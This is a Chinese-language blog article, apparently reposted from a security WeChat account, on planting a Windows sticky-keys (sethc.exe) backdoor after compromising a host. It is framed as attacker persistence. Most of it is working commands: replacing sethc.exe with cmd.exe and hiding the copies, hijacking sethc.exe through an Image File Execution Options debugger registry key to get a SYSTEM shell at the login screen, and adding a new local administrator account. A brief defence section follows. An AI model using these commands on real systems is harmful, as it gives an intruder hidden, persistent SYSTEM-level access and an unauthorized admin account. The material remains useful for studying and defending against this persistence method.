0x00 前言
通常,在內(nèi)網(wǎng)滲透打下一臺(tái)機(jī)子之后,可以給這臺(tái)機(jī)子留個(gè)Shift后門。
0x01 Shift后門利用
簡(jiǎn)介
粘滯鍵漏洞,在Windows系統(tǒng)下連續(xù)按5下SHIFT鍵,可以啟動(dòng)系統(tǒng)的粘滯鍵功能,其進(jìn)程名為Sethc.exe,應(yīng)用程序在Windowssystem32下。
黑客用其它應(yīng)用程序(如:cmd.exe、explorer.exe 或木馬、病毒)將Sethc.exe替換。當(dāng)再次連續(xù)按5次SHIFT鍵,就會(huì)啟動(dòng)黑客替換的應(yīng)用程序,如此便留下了5下SHIFT后門,黑客3389登錄遠(yuǎn)程計(jì)算機(jī)時(shí),在用戶登錄界面,連續(xù)按5下SHIFT就可以啟動(dòng)該漏洞,進(jìn)而控制遠(yuǎn)程計(jì)算機(jī)。
漏洞原理
在Windows系統(tǒng)登錄界面狀態(tài)下,粘滯鍵仍可以以連續(xù)按5下SHIFT鍵運(yùn)行,并且此時(shí)應(yīng)用程序會(huì)以WINDOWS的最高權(quán)限-SYSTEM權(quán)限運(yùn)行,所以計(jì)算機(jī)一旦被安裝該后門,入侵者便可悄無(wú)聲息地遠(yuǎn)程操縱計(jì)算機(jī)。
漏洞利用
大致思路如下:
拿到目標(biāo)主機(jī)權(quán)限后,到Windowssystem32目錄下,將sethc.exe替換成cmd.exe;
其中,命令行方式為:
copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe attrib c:windowssystem32sethc.exe +h attrib c:windowssystem32dllcachesethc.exe +h
注意:要將dllcache文件夾中的緩存刪掉,否則會(huì)自動(dòng)復(fù)原回去。
注冊(cè)表方式為:
REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"
命令說(shuō)明:reg add是向注冊(cè)表添加記錄,后面跟的是注冊(cè)表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫。Image File Execution Option這個(gè)目錄是用來(lái)設(shè)置鏡像劫持的,要被劫持的就是命令中的sethc粘滯鍵程序,隨后通過(guò)/ v來(lái)指定鍵名,其中鍵名debugger是固定的,然后通過(guò)/ t來(lái)指定REG_SZ字符串類型,最后通過(guò)/ d來(lái)指定鍵的值,即被惡意替換的程序cmd.exe。
這樣,在下次遠(yuǎn)程連接目標(biāo)主機(jī)登錄的時(shí)候就可以連續(xù)5下SHIFT觸發(fā)cmd.exe;
可以輸入explorer.exe調(diào)出程序管理系統(tǒng)方便操作;
當(dāng)然,上面的方法存在缺陷,就是可能會(huì)導(dǎo)致遠(yuǎn)程連接無(wú)法持久進(jìn)行,因此可以直接添加新用戶便于下次直接登錄:
net user mi1k7ea 123456 /add net localgroup administrators mi1k7ea /add'
防御方法
如果系統(tǒng)盤為NTFS文件系統(tǒng),可以將sytem32下的sethc.exe文件設(shè)為everyone拒絕訪問(wèn);
直接將其刪除,最好的方法是在控制面板-輔助功能選項(xiàng)-粘滯鍵選項(xiàng),將“使用快捷鍵”取消即可。;
通過(guò)注冊(cè)表設(shè)置實(shí)現(xiàn)防御;
審核編輯 :李倩
-
WINDOWS
+關(guān)注
關(guān)注
3文章
3541瀏覽量
88633 -
應(yīng)用程序
+關(guān)注
關(guān)注
37文章
3267瀏覽量
57684 -
Shift
+關(guān)注
關(guān)注
0文章
5瀏覽量
7467
原文標(biāo)題:Windows Shift后門利用
文章出處:【微信號(hào):菜鳥學(xué)安全,微信公眾號(hào):菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
相關(guān)推薦
評(píng)論